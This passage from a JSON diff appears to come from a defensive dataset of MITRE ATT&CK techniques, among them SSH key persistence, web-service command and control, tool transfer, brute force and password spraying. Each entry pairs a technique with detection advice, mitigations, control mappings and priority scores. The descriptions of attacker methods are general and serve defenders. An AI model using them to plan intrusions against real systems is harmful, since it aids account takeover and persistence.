Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1098.003", + "name": "Account Manipulation: Add Office 365 Global Administrator Role", + "url": "https://attack.mitre.org/techniques/T1098/003", + "description": "An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) \n\nThis account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.", + "detection": "Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1098.004", + "name": "Account Manipulation: SSH Authorized Keys", + "url": "https://attack.mitre.org/techniques/T1098/004", + "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)", + "detection": "Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.\n\nMonitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "cumulative_score": 1.0408471692209522, + "adjusted_score": 1.0408471692209522, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.12,3.3,4.1,4.2,4.4,4.7,4.8,5.3,5.4,6.1,6.2,6.3,6.4,6.5,11.3,11.4,12.2,12.8,16.8,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "SC-46", + "SC-7", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1102", + "name": "Web Service", + "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "url": "https://attack.mitre.org/techniques/T1102", + "tactics": [ + "Command And Control" + ], + "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1102.001", + "name": "Web Service: Dead Drop Resolver", + "url": "https://attack.mitre.org/techniques/T1102/001", + "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + }, + { + "tid": "T1102.002", + "name": "Web Service: Bidirectional Communication", + "url": "https://attack.mitre.org/techniques/T1102/002", + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", + "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + }, + { + "tid": "T1102.003", + "name": "Web Service: One-Way Communication", + "url": "https://attack.mitre.org/techniques/T1102/003", + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.", + "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ], + "cumulative_score": 0.643817146912381, + "adjusted_score": 0.643817146912381, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.3,2.5,9.3,13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1104", + "name": "Multi-Stage Channels", + "description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.", + "url": "https://attack.mitre.org/techniques/T1104", + "tactics": [ + "Command And Control" + ], + "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 0.29965205016, + "adjusted_score": 0.29965205016, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1105", + "name": "Ingress Tool Transfer", + "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.", + "url": "https://attack.mitre.org/techniques/T1105", + "tactics": [ + "Command And Control" + ], + "detection": "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "File: File Creation", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 2.214421752664762, + "adjusted_score": 2.214421752664762, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1106", + "name": "Native API", + "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).", + "url": "https://attack.mitre.org/techniques/T1106", + "tactics": [ + "Execution" + ], + "detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Module: Module Load", + "Process: OS API Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ], + "cumulative_score": 1.1414365281219048, + "adjusted_score": 1.1414365281219048, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [ + "AC-6", + "CM-2", + "CM-6", + "CM-7", + "SI-2", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1110", + "name": "Brute Force", + "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.", + "url": "https://attack.mitre.org/techniques/T1110", + "tactics": [ + "Credential Access" + ], + "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.", + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Command: Command Execution", + "User Account: User Account Authentication" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1110.001", + "name": "Brute Force: Password Guessing", + "url": "https://attack.mitre.org/techniques/T1110/001", + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", + "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", + "mitigations": [ + { + "mid": "M1036", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "url": "https://attack.mitre.org/mitigations/M1036" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1110.002", + "name": "Brute Force: Password Cracking", + "url": "https://attack.mitre.org/techniques/T1110/002", + "description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.", + "detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1110.003", + "name": "Brute Force: Password Spraying", + "url": "https://attack.mitre.org/techniques/T1110/003", + "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", + "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.\n\nConsider the following event IDs:(Citation: Trimarc Detecting Password Spraying)\n\n* Domain Controllers: \"Audit Logon\" (Success & Failure) for event ID 4625.\n* Domain Controllers: \"Audit Kerberos Authentication Service\" (Success & Failure) for event ID 4771.\n* All systems: \"Audit Logon\" (Success & Failure) for event ID 4648.", + "mitigations": [ + { + "mid": "M1036", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "url": "https://attack.mitre.org/mitigations/M1036" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1110.004", + "name": "Brute Force: Credential Stuffing", + "url": "https://attack.mitre.org/techniques/T1110/004", + "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)", + "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", + "mitigations": [ + { + "mid": "M1036", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "url": "https://attack.mitre.org/mitigations/M1036" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1036", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "url": "https://attack.mitre.org/mitigations/M1036" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 1.2161784712666668, + "adjusted_score": 1.2161784712666668, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.1,4.7,5.2,5.3,6.3,6.4,6.5,4.10" + ], + "nist_controls": [ + "AC-2", + "AC-20", + "AC-3", + "AC-5", + "AC-6", + "AC-7", + "CA-7", + "CM-2", + "CM-6", + "IA-11", + "IA-2", + "IA-4", + "IA-5", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1111", + "name": "Two-Factor Authentication Interception", + "description": "Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)", + "url": "https://attack.mitre.org/techniques/T1111", + "tactics": [ + "Credential Access" + ], + "detection": "Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.\n\nSimilar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Driver: Driver Load", + "Process: OS API Execution", 